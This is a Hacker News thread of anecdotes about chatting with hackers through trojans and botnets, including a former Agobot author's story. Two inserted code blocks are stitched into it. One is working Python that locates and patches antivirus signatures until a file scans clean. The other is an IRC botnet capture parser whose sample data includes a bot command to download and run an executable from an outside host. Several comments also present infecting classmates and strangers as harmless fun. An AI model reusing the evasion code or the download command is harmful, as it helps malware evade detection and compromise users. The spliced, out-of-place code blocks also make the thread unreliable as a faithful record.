
Have you ever chatted with a hacker within a virus? - jhchabran
http://blogs.avg.com/news-threats/chatted-hacker-virus/
======
waffle_ss
Well, back in my pre-teen script kiddie days of using BO2K/Netbus and early
Sub7 builds I was on the other side of the screen. Sub7 I recall distinctly
had all the listed features and a lot more - keylogging, chat client, webcam
viewing, screen capture, open/closing CD tray, etc. There was a GUI interface
that would let you select any of the above features that would create a
payload that could be injected into any .exe file. You could also provide an
ICQ account number that would get a message any time the client comes online,
with the relevant IP:port to connect to. These were in the days before anti-
virus or firewalls were prevalent, so it was pretty easy to trick people into
opening an infected .exe.

I think I ended up having around 80 people infected, so there was always
someone online. I never did anything malicious with it, just chatting and
opening/closing CD-ROM drives mostly (and juvenile things like sending my
friend's browser to bigboobs.com ... unfortunately his dad was standing behind
him at the time). I had dial-up so the webcam viewing wasn't feasible. If
someone was freaked out and wanted me to go away I could remotely destroy the
trojan. Come to think of it, most people were just curious about what was
going on and didn't seem to mind the chat very much (but obviously they
usually wanted me to remove it / delete it afterward). Then again, I infected
people by random selection on ICQ, so maybe they were just chatty people.

~~~
wahsd
Does anyone know if all webcams have the activity light hardwired in-line with
the webcam itself? I have always wondered if the light is a definitive
indicator of whether the cam is on, or if the light can be deactivated. Sorry, I
guess this only applies to non-Mac, mostly Win, machines as something so
plebeian as an indicator light would never make it into a Mac.

~~~
kamkha
Nice try with the jab at Apple—MacBook Pros have a small green light to
indicate whether the camera is in use or not.

~~~
spec_laconic
Yeah, you can just take a quick pic using the camera; the light flashes for
barely a second and you won't notice. Metasploit has a stager for exactly this
purpose:
[http://www.metasploit.com/modules/payload/osx/x86/isight/rev...](http://www.metasploit.com/modules/payload/osx/x86/isight/reverse_tcp)

~~~
kaybe
There's always a bit of black cardboard and tape. Try to take a picture now.
:)

~~~
leke
Lol, I actually have a bit of duct tape over my eeePC web cam.

------
myared
Not the same, but similar story... 6-8 years ago, I chatted directly with the
person responsible for breaking into a web server on the server itself. It's a
strange feeling to ssh in and watch someone browsing through files. I did a
'echo "hello?" | wall', showed the guy how to answer me back, and we
eventually moved the conversation to IRC. I was using some website to convert
English to Portuguese.

Turns out it was a (young) teenager from Brazil. His compromise was that he
wouldn't touch our files or deface our websites so long as he could remain in
control of the server. I carelessly tried to kick him off, uninstall the
rootkit and restart the server only to find out that he could continue to use
the same exploit to get access. Then we just called our host and asked them to
take down the box. Lost a whole day to it, but I walked away understanding a
little bit more about motivation, and learned about an exploit that I hadn't
known about previously.

------
willvarfar
Steve Gibson (grc.com) famously used chatroom credentials in a trojan he
reverse-engineered to get in and chat with the bot maker.

And, infamously, got DDOSed for it.

Can't find the transcript now, which is a shame; I think he took it offline to
let the intertubes cool down.

~~~
stephenheron
<http://www.crime-research.org/library/grcdos.pdf> I think this is what you
are talking about, really interesting read if I remember correctly.

~~~
TazeTSchnitzel
>When those insecure and maliciously potent Windows XP machines are mated to
high-bandwidth Internet connections, we are going to experience an escalation
of Internet terrorism the likes of which has never been seen before.

He was right, too.

EDIT: That was an absolutely fascinating read. Thank you.

------
molmalo
Back in 2000, when I was in high school, I developed a trojan similar to
NetBus and Sub7, but just to use it in the school computer labs. The objective was
only to have fun: telling my friends their login passwords, controlling their
PCs (screen streaming, key logging, file management, mouse and keyboard control,
some nice screen effects like making the screen move like ocean waves, launching
programs; it was fun, lol). There were like 200 machines connected. The
infection was simple (auto-installed in services/run) and later it was even
network-automated (when I got the admin pass). Then I handed the commanding
program to some friends who used it a little bit too much. We even had the net
admin's credentials, so we started to get some extra benefits (like internet
outside the internet lab, etc.). The admins realized what was happening, and
started to use Norton Ghost on every PC, first once a week (before it was once
every 2 weeks), then, as the infections didn't stop and they started to get
very paranoid, they ran Norton Ghost every single day. It all ended when they
discovered a copy of the source code I had given to a friend of mine. They
confronted him, but luckily he took the blame (as he later told me, it was very
dumb of him to have saved a copy in his own account). But he managed to
convince them that it was just a learning project that went a little bit too
far. They reprimanded him but nothing serious happened to him. So, he is still one
of my closest friends =)

~~~
sharkweek
Most of the time those moments of getting caught turn into great opportunities
to get out of trouble by going white hat for them. I figure if they threatened
him with any real punishment, just offer some free security consulting.

~~~
erikb
In a perfect world that might happen. Sadly people are not happy if you point
out their mistakes to them, and they can get very aggressive against you, especially
when their job or their public reputation might be at stake. Add an age
difference of over 20 years and an IT education that started with punching
holes into cards and you are f____d. Then going to offer them your
assistance wouldn't be the smart thing to do, don't you think?

~~~
leke
It really would make great sense to create a 'report exploits' link on your
site/software so that people know they can freely contact you about this kind
of thing without repercussions. I actually got one about 2 days ago for a
forum I coded because of such a link I put there.

It might be interesting to even make a whole website dedicated to exploit
hunting and allow companies to register themselves.

------
raintrees
Back a bit (yes, I am dating myself here), I worked for a floppy disk
duplicating company that was hired by a certain software company to attempt to
duplicate the disks with built-in copy protection. The customer provided a
routine where they would have the end-users' disk controllers read a hidden
half sector at the end of a half-sized normal ninth sector, I think was the
gist of that particular scheme.

If I remember correctly, they had typed some example code in plain ASCII, so
we obliged with the typical "help, I'm being held captive in a Chinese disk
duplication company." Which was almost true, as the owners of our company were
of Chinese descent. And in my defense, we did have a number of all-nighters
(with pizza) when another software company would call us with a sudden "we've
changed the masters - erase and re-dupe whatever you have." I was younger,
then...

Anyway, a few messages were passed back and forth this way, before we got back
to serious business and implemented the copy protection scheme. Not really a
virus, but still geeky fun.

Did you know that 8" floppy disks had excellent aerobatic qualities when flung
from the top of a building? The trick was holding them by the corner during
the wind-up...

------
dsrguru
Sorry for the tangent, but did the author really have to assert his or her
endorsement of Chinese nationalist politics and write "Taiwan, China" instead
of the neutral "Taiwan"? Taiwan is not currently controlled by the PRC,
regardless of whether or not one believes it "should" be. Taiwan's acting
government, the ROC, believes it shouldn't be, and China's government, the
PRC, believes it should be. Most Taiwanese people seem to agree with the ROC,
but I've met some who identify as Chinese and would be fine being governed by
the PRC. To refer to a disputed land as objectively part of a specific
country, one that doesn't even currently govern it no less, really bothers me.

~~~
jackalope
Fellow web developers, I can tell you from experience that you must edit this
list before deploying it in an application:

[http://www.iso.org/iso/country_codes/iso_3166_code_lists/cou...](http://www.iso.org/iso/country_codes/iso_3166_code_lists/country_names_and_code_elements.htm)

My understanding is that we have the UN to thank:

[http://www.iso.org/iso/country_codes/background_on_iso_3166/...](http://www.iso.org/iso/country_codes/background_on_iso_3166/iso_3166_and_the_un.htm)

~~~
mkl
Is it just Taiwan, or are there other countries in similar situations?

~~~
freehunter
The ISO list shows Occupied Palestine in its preferred UN nomenclature,
PALESTINIAN TERRITORY, OCCUPIED. This is a politically controversial area as
well. How you should choose to identify the area depends in part on which
region you're targeting your site/app at.

------
tshadwell
Recently a friend of mine sent me a piece of obfuscated JS that was in a
phishing page that was being posted around his large gaming related website.
Threw the JS into Closure Compiler with advanced optimisations and pretty
print and out came relatively unobfuscated code; it cleared up the series of
horrible regexes anyway. The code injected a Java applet that downloaded a
botnet virus. Decompiling the Java applet revealed the Steam ID of the guy
orchestrating this. Added him on Steam and had a great conversation in which
he accidentally indirectly admitted the botnet was under his control. A fun
use of a Sunday. The evidence was never sent to anyone, thinking nothing would
come of it.

~~~
mikeevans
Any idea why he would put his Steam ID in the applet?

~~~
tshadwell
It was on a website for trading items on steam. Perhaps he wanted to force
them to trade items, then sell the items on for real life money.

------
emehrkay
To answer the title: yes.

It was my freshman year of college and my first introduction to broadband in
1998. I discovered IRC via mIRC and somehow somebody put something on my
computer where they could control the mouse/keyboard.

I watched the guy move the cursor around for a while then began to type to
him. He was cool, and told me how to prevent it from happening again.

~~~
splatzone
How did he do it?

~~~
emehrkay
I have no idea. I wish I did though

------
EricR23
When I was a teenager I found it fun to intentionally infect myself with
malware and try to study it. I now realize this wasn't the most responsible
thing to do, as I wasn't in a sandboxed environment, but it was a great
learning experience and taught me a _lot_ about networking and security.

One of the biggest pieces of malware I ever managed to infect myself with was a bot,
which caused my computer to become a zombie on a ~10K botnet. I spent hours
running a packet sniffer and seeing how the client interacted with the IRC
network it called home to. Upon connecting to the privately run IRC network,
the bot would authenticate with a user and pass. I assume it created one upon
connecting the first time to the network. My best guess as to why this is is
so that the bot master could track the total number of zombies and compare it
to how many were actively connected to the botnet. Kind of a clever way to
get metrics, now that I think about it.

When I temporarily stopped the bot from connecting to IRC, I decided it might
be fun to login as the bot and join the channel I saw it connecting to. Upon
joining the channel, I saw thousands of other users on the channel. I spent a
couple of days sitting there, masquerading myself as a bot, and watching the
botmaster interact with the bots. The botmaster would issue commands that I
can't really recall anymore, but I do remember seeing a lot of commands that I
assumed told the bots to download extra malware from a remote host. I remember
seeing URLs for zip and exe files.

Eventually I got a little bored of this, so I decided to message the
botmaster. It was easy to spot him; out of the three ops on the channel, he
was the only full op. I tried a "hello" and waited. And waited. And then I was
k-lined from the IRC network.

The next day when I logged onto my computer, I found my Internet connectivity
was being overwhelmed with bogus TCP requests. I had pissed off the botmaster
by snooping, and now I was getting DDoS'd. I imagine he/she commandeered a
small number of the bots to do this. It wouldn't take many... I imagine back
then, given my bandwidth, 10-15 would have done it.

Fun times. I remember posting about my botnet adventures to Security Focus way
back when. Some people got really interested and followed my posts, while
other professionals asked me to stop because I wasn't running a sandbox.

IMO, those were different times. I'm not sure I'd recommend something like
this these days. After hearing about certain botnets being tied to various
mafias and gangs around the world (which is probably more common than you
think. See [http://www.ibtimes.co.uk/articles/321149/20120329/mafia-cont...](http://www.ibtimes.co.uk/articles/321149/20120329/mafia-controlling-cybercrime-botnets.htm)), I'm not sure I'd really want to risk interfering
with their activities.

~~~
niekmaas
Perhaps a rather naive question, but: were the username and pw transferred in
plaintext?

~~~
sirclueless
Think of the username and password as a tracking cookie, more than actual
authentication.

------
baby
Reminds me of those good times when me and my friends discovered trojans. We
kept infecting people, until they found out about it and started doing it as
well. It became a war between us. Almost everyone got infected in our class.

I remember the pranks we used to pull, like printing "Help me I'm trapped
inside the printer!", changing the wallpaper for a porn one, typing messages
instead of the person on MSN.

Once we infected some random guy we didn't know, and popped up a black chat
screen (like the one in matrix) and before we could write "Hi Neo" the guy was
already writing to us "hey what's up?". The guy was so stupid he chatted with
us like it was a normal thing.

Then we all grew up and we felt a bit bad for finding stuff we shouldn't have
found, so we stopped.

------
thechut
"I am sorry but AVG blogs are currently undergoing essential maintenance.

Normal service will be resumed shortly, in the meantime go to AVG.com for more
information about AVG products or go to our Facebook page to join our thriving
online community.

We apologise for any disruption this may have caused."

~~~
fuzzix
[http://webcache.googleusercontent.com/search?q=cache:blogs.a...](http://webcache.googleusercontent.com/search?q=cache:blogs.avg.com/news-threats/chatted-hacker-virus/)

No screen shots or links in this, obviously.

------
alanbyrne
Is it just me or do the "features" of this trojan resemble a late 90's NetBus?

------
saintfiends
Back in the day I used to do this. I would stay up the better part of the night
adding random people to MSN or ICQ and sending the Trojan saying it was my
picture. So before sending it I would describe myself as someone they'd want
to see, to drive up their curiosity; basically I'd be whatever they'd want me to
be. This was very successful. I never maintained a big list of zombied boxes,
I'd infect and remove on a per-night basis depending on how bored I was.

I also saw the progression of hiding IPs in MSN connections. At first they
would make a direct connection, later they only made a direct connection while
transferring files bigger than a certain size. They completely removed it
after some point, don't remember very well.

After I got to know more about networking and how things are connected, I realized
that my ISP allowed me to initiate NULL sessions to other customers. I remember
how excited I was to find this. I would place the RATs everywhere with curious
names in hopes for them to click, or just test exploits on them.

Another interesting thing I found was I was able to invite anyone, even random
emails (Hotmail), while having a group chat. I had so much fun doing that back
then.

After infection it was basically just chatting, messing with the LEDs, CD-ROMs..
people were more interested in finding out how I did it and just chatting
rather than being mad. I remember one time when I did this to a friend he got
scared and ripped off the cable, breaking the wall socket.

It was really easy to evade anti-virus programs at the time. I usually just
split the file in half, ran the scanner on it, split again until I narrowed
down to the signature and would just change a value or two.

It was interesting to see how many times people change the text before hitting
send while chatting. Obviously I was too naive to know and respect privacy
back then.
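
The split-and-rescan trick in the last paragraph, as an added example that is not part of the post: the scanner here is a constructed stand-in that flags any buffer containing one of two made-up byte patterns, and the "infected file" is constructed filler with those patterns embedded at known offsets; nothing talks to a real AV engine. The bisection narrows the file to the smallest window the scanner still flags, patches one byte in it, and repeats until clean, which is the general form of doing it by hand one split at a time, and it goes one step beyond the post by handling a file that trips more than one signature.

```python
import random

# Constructed toy "signature database" for the stand-in scanner below.
# Real engine patterns are longer and are only one layer of detection;
# these are just bytes to be found.
SIGNATURES = [
    b"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f",  # 10 bytes, push-immediate style
    b"sub7server",                                # 10 bytes
]


def toy_scanner(data: bytes) -> bool:
    """Stand-in for a pure pattern-matching AV: True if any signature occurs
    anywhere in the buffer. This is the only behaviour the bisection uses."""
    return any(sig in data for sig in SIGNATURES)


def locate_signature(data: bytes, scanner) -> tuple:
    """Return (start, end) of the smallest window the scanner still flags.

    Requires scanner(data) to be True and detection to depend on a contiguous
    byte pattern, so scanner(data[:n]) is False below some n and True from
    there on, and likewise for suffixes. That is the split-and-rescan
    assumption; hash- or behaviour-based detection does not satisfy it.
    """
    # Smallest prefix length that is still flagged: the signature's end.
    lo, hi = 0, len(data)
    while lo < hi:
        mid = (lo + hi) // 2
        if scanner(data[:mid]):
            hi = mid
        else:
            lo = mid + 1
    end = lo
    # Largest suffix start, inside that prefix, still flagged: its start.
    lo, hi = 0, end
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if scanner(data[mid:end]):
            lo = mid
        else:
            hi = mid - 1
    return lo, end


def patch_until_clean(data: bytes, scanner, max_rounds: int = 16):
    """Locate, patch one byte in the window, rescan; repeat until clean.

    Returns (patched_bytes, list_of_windows). A file that trips several
    signatures needs one round per signature.
    """
    patched = bytearray(data)
    windows = []
    for _ in range(max_rounds):
        if not scanner(bytes(patched)):
            return bytes(patched), windows
        start, end = locate_signature(bytes(patched), scanner)
        windows.append((start, end))
        # Flip the middle byte of the window. On a real binary this must
        # hit a string or slack space, not an instruction that executes.
        patched[(start + end) // 2] ^= 0xFF
    raise RuntimeError("still flagged after %d rounds: not a plain pattern match" % max_rounds)


def build_sample() -> bytes:
    """Constructed 'infected file': deterministic filler with SIGNATURES[1]
    embedded at offset 300 and SIGNATURES[0] at offset 710."""
    rng = random.Random(7)
    filler = bytes(rng.getrandbits(8) for _ in range(1000))
    return filler[:300] + SIGNATURES[1] + filler[300:700] + SIGNATURES[0] + filler[700:]


SAMPLE = build_sample()

if __name__ == "__main__":
    cleaned, found = patch_until_clean(SAMPLE, toy_scanner)
    for start, end in found:
        print("signature at [%d:%d): %r" % (start, end, SAMPLE[start:end]))
    print("still detected:", toy_scanner(cleaned))
```

The only property it relies on is that detection is a contiguous byte pattern, so truncating the file from either end flips the verdict at a single offset. A hash-based, emulation-based or behavioural detection has no such offset, and on a real executable the patched byte has to land in a string or slack space rather than in code that runs, which is what made "change a value or two" work at the time and why pure pattern signatures stopped being enough on their own.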

------
jes5199
Yeah, when I was at boarding school (high school), we had a LAN in the dorms
full of everybody's shiny new Windows 95 desktops. So everybody just had SMB
shares, and nobody was careful about what they clicked on. I put a trojan exe
with the icon made to look like a text file in mine. Someone clicked on it,
and then I popped up a dialog box that said "Hello! You've got a trojan. Open
notepad and let's talk about it" and he typed into notepad and I watched with
the keyboard sniffer and answered back by injecting keypresses. (I couldn't
see video of the screen - I think I could take screenshots, though) I learned
a lot about networking that year.

------
tmh88j
A long time ago (windows 98 I believe) my screen went blank and green text
appeared saying "Hello, how are you?" I was about 12 at the time so I had no
idea what was going on. I don't recall my response, but I remember the
"person" on the other side saying "You left a back door open. Would you like
me to close it?" I restarted my computer and I still have no idea what it was.

Was this a virus, a hacker, something else? I completely forgot about it until
this thread.

~~~
TazeTSchnitzel
Probably a worm.

------
huepfburg
I am the creator of the PTN FUN TROJAN from 2003. I was just starting to learn
coding and created this simple server/client program using Visual Basic and
numerous VB code snippets I found online. I was able to open/close CD trays,
turn off monitors, disable CTRL+ALT+DEL, send screenshots, hide the mouse
pointer and other stuff. I created an autostart CD with the title "CS MAPS"
and handed it around on private LANs, infecting all my friends' computers. I had
quite a few computers depending on my mercy. On one occasion, one of my
friends realized he wasn't in full control of his computer. He opened Notepad
and tried to communicate with me, the hacker, by typing messages. I could read
his messages from the screenshots and found it pretty hilarious at that time.
I responded by turning his screen upside-down.

------
orangethirty
Reminds me of all the fun I had playing with malware on my own computer during
the mid-to-late 90's. Being quite ignorant about the whole thing allowed me to
look and find things that would not be considered safe. Hacker websites (like
the old cult of the dead cow folks), exploits, etc. I remember downloading the
LOIC and wondering what the hell it was.

Of course, I wanted to be a "hacker". You know, make ATMs spit out cash so my
brother could buy a more powerful engine for his Mustang. That kind of thing.
Never really meant or even did harm, because my limited knowledge back then
kept me out of trouble.

I did however get to do something very important while looking for people to
"hack" (not really) on ICQ. I met my wife. Wonderful things happen by
serendipity.

------
ubernostrum
How about recommending movies to the person who hacked your Netflix account?

[http://www.reddit.com/r/AskReddit/comments/v0z53/for_the_pas...](http://www.reddit.com/r/AskReddit/comments/v0z53/for_the_past_two_years_i_have_been_sharing_my/)

------
mathewsimonton
When I was about 11 or 12 years old, I was chatting with a friend on AOL
Instant Messenger and suddenly was forced into a black screen with green text
where I communicated briefly to someone who was forcing this new chat session
onto me. The crack scared the absolute crap out of me. It ended once I told
the person that I was irritated and that I was going to contact the police (I
didn't and I doubt there was anything that really could have been done). Once
the fear subsided I became more interested in how this person did what they
did. It's one of those weird technology-related moments that sticks out in my
mind to this day more than 10 years later.

------
dak1
Just as a side note, the post was made in Taiwan's D3 forum, but from the use
of simplified Chinese, it seems the hacker was from China.

------
ago
I am a convicted malware coder (Agobot/Gaobot/Phatbot/etc...) and it all
started because of a chat I had with a botmaster.

Back then I needed a key for Warcraft III, which just came out, so I tried
some keygen I found on the net, without any antivirus. When the keygen did not
work I knew something was wrong, so I checked for suspicious network traffic
and saw some IRC connection, quickly found the process responsible for causing
the traffic and fired up a disassembler. After UPX unpacking I had the
assembler code to the program and was able to determine the IRC server, the
bot password (they didn't use password hashes or hostmasks back then) and I
got a command reference for the specific bot (SDBOT). I joined the channel
disguised as one of the bots, logged in and sent the remove command. This
kills the botnet. The bot herder was pissed, but I started talking to him and
I got interested in malware to get CD keys, which I couldn't afford at the
time.

I started modifying SDBOT for my usage, writing scanners and fixing bugs in
the IRC connection code. After a while I felt limited by the codebase and
started my own called Agobot. Agobot quickly grew into one of the most capable
trojans at the time, with thousands of variants. I also quickly got a team of
at peak ~15 people together who helped with testing and coding. Coding was
mostly done by me and at most 3 other coders. We had really cool
stuff, like wormride which was a tool to make other malware/worms spread
Agobot instead of itself. It also contained an exploit that I wrote for the
LSASS hole that Sasser used only a few days after the advisory. My LSASS
exploit did not crash the target, which let it spread a few days without being
noticed. ISC noticed it after a while and raised the threat level to orange.

There was also a variant of the bot that used the waste network to communicate
and the gnutella network to find themselves. It made the DHS shit their pants
and release an advisory :)

First I hosted the bots on public IRC, but after being detected very quickly I
got to talk with some IRC opers that offered me a private server to run the
botnet in exchange for usage rights. These were powerful servers, holding
around 50k bots at peak. Basically this all got busted by the FBI, which
caused the Foonet/CIT shutdown. For more info, check these URLs:

<http://www.theregister.co.uk/2004/08/27/ddos_mafia_busted/>

<http://regmedia.co.uk/2008/10/03/03116720232.pdf>

<http://www.securityfocus.com/news/9411>

<http://newssocket.com/foonet/>

[http://www.techimo.com/forum/imo-community/100728-your-isp-n...](http://www.techimo.com/forum/imo-community/100728-your-isp-next-one.html)

Anyway, they caught me because I accidentally let a bot start a short scan
from the Linux host where we hosted the SVN repository and IRC. The company
running the datacenter detected the scan and decided to investigate the server
(illegally) and found all the stuff (I didn't even think about encrypting all
that). I got 2 years probation for this as well as hacking Valve Software.

Here's some more info:

<http://en.wikipedia.org/wiki/Agobot>

<http://www.honeynet.org/node/55>

<http://www.infectionvectors.com/vectors/kitchensink.htm>

[http://web.archive.org/web/20070423182932/http://www.lurhq.c...](http://web.archive.org/web/20070423182932/http://www.lurhq.com/phatbot.html)
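
As an added example, not code from the thread, serving both EricR23's account of sniffing the bot's IRC traffic and ago's account of recovering the server and bot password: a small IRC line parser run over a constructed capture of one bot's session. The `C`/`S` direction tags, every nick, host and address, the `.` command prefix and the `.login` verb are assumptions in the general sdbot style, not values from either post. ago got the same facts from the unpacked binary; the sniffer route gives the same answer because, as he says, the password went over the wire as a plain shared secret.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# RFC 1459 message shape: [":" prefix SPACE] command [params] [" :" trailing]
IRC_LINE = re.compile(r"^(?::(?P<prefix>\S+) )?(?P<cmd>\S+)(?: (?P<params>.*))?$")
URL_RE = re.compile(r"(?:https?|ftp)://\S+", re.IGNORECASE)


def parse_irc(line: str) -> Tuple[Optional[str], str, List[str]]:
    """Split one IRC line into (prefix, COMMAND, params). The trailing
    parameter introduced by ' :' is kept whole, as the protocol defines it."""
    m = IRC_LINE.match(line)
    if not m:
        raise ValueError("not an IRC line: %r" % line)
    raw = m.group("params") or ""
    if raw.startswith(":"):
        params = [raw[1:]]
    elif " :" in raw:
        head, trailing = raw.split(" :", 1)
        params = head.split() + [trailing]
    else:
        params = raw.split()
    return m.group("prefix"), m.group("cmd").upper(), params


@dataclass
class C2Profile:
    """What a passive observer learns about the C&C from one bot's session."""
    server: Optional[str] = None
    bot_nick: Optional[str] = None
    channel: Optional[str] = None
    channel_key: Optional[str] = None
    herder: Optional[str] = None          # nick that authenticated to the bot
    login_password: Optional[str] = None  # shared secret, sent in the clear
    commands: List[Tuple[str, str]] = field(default_factory=list)
    download_urls: List[str] = field(default_factory=list)
    kicked: bool = False


def analyze_capture(lines, cmd_prefix: str = ".", login_verb: str = "login") -> C2Profile:
    """Walk a captured session ("C " = bot -> server, "S " = server -> bot)
    and fill in a C2Profile. The '.' command prefix and '.login' verb are
    assumptions in the sdbot style, not values taken from the thread."""
    prof = C2Profile()
    for raw in lines:
        direction, _, line = raw.partition(" ")
        prefix, cmd, params = parse_irc(line)
        if direction == "C":
            if cmd == "NICK":
                prof.bot_nick = params[0]
            elif cmd == "JOIN":
                prof.channel = params[0]
                prof.channel_key = params[1] if len(params) > 1 else None
            continue
        if cmd == "001":                       # welcome: prefix is the server
            prof.server = prefix
        elif cmd == "PRIVMSG" and len(params) == 2:
            sender = (prefix or "").split("!", 1)[0]
            text = params[1]
            if not text.startswith(cmd_prefix):
                continue                       # chatter, not a bot command
            prof.commands.append((sender, text))
            verb, _, rest = text[len(cmd_prefix):].partition(" ")
            if verb == login_verb and rest:
                prof.herder = sender
                prof.login_password = rest.split()[0]
            prof.download_urls.extend(URL_RE.findall(text))
        elif cmd in ("465", "KILL", "ERROR"):  # banned / killed / dropped
            prof.kicked = True
    return prof


# Constructed capture, not real traffic: nicks, hosts, addresses and
# commands are invented to show the shapes the posts describe.
CAPTURE = [
    "C NICK [USA|XP|37215]",
    "C USER xsxqd 0 * :xsxqd",
    "S :irc.example.test 001 [USA|XP|37215] :Welcome to the IRC network",
    "C JOIN #bots k3yw0rd",
    "S :herder!owner@203.0.113.9 PRIVMSG #bots :.login s3cr3tpass",
    "C PRIVMSG #bots :[MAIN]: Password accepted.",
    r"S :herder!owner@203.0.113.9 PRIVMSG #bots :.download http://203.0.113.7/update/loader.exe c:\load.exe 1",
    "S :herder!owner@203.0.113.9 PRIVMSG #bots :.scan 10.0.0.0 445 200",
    "S :helper!op@198.51.100.4 PRIVMSG #bots :hi",
    "S :irc.example.test 465 [USA|XP|37215] :You are banned from this server (K-Lined)",
]

if __name__ == "__main__":
    p = analyze_capture(CAPTURE)
    print("C&C:", p.server, p.channel, "key=%s" % p.channel_key)
    print("herder:", p.herder, "password:", p.login_password)
    print("payload URLs:", p.download_urls, "kicked:", p.kicked)
```

The point sirclueless makes falls out of the profile: the "credential" is one cleartext string shared by every bot, so it tells the herder who is a member but authenticates nothing, and anyone who reads it from a capture or from the unpacked binary can speak in the channel as a bot, which is how ago took over the SDBOT net. The `kicked` flag is the cheap tell EricR23 hit: a k-line or KILL shortly after an unexpected message from a "bot".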

------
strictfp
Alternative title: Amateur virus analyst does not take necessary precautions,
gets pwned by virus author.

~~~
kehrlann
Not all of us are professional virus analysts. No need to mock him, his post
is worth reading for mere amateurs like myself.

~~~
strictfp
True. Just find it odd that this gets posted on the official blog. Interesting
indeed, but a bit careless.

------
Feoh
This article REALLY makes me wish I could turn on my Mac laptop's built-in
camera and microphone.

~~~
science_robot
You can't? Here's a MacRuby script that can take a photo with your webcam:
<https://github.com/pioz/snappy>.

~~~
sukuriant
Now, given the content of the article a moment ago, the question becomes:
"Should I trust science_robot? Or is this a trojan?"

~~~
erikb
Well, just learn Ruby and read the source code of snappy, then write your own
camera activation code -> no problem. If you don't trust your link, go to the
well-known GitHub website and search for the project yourself.

"With growing wish for self responsibility comes growing need for power."

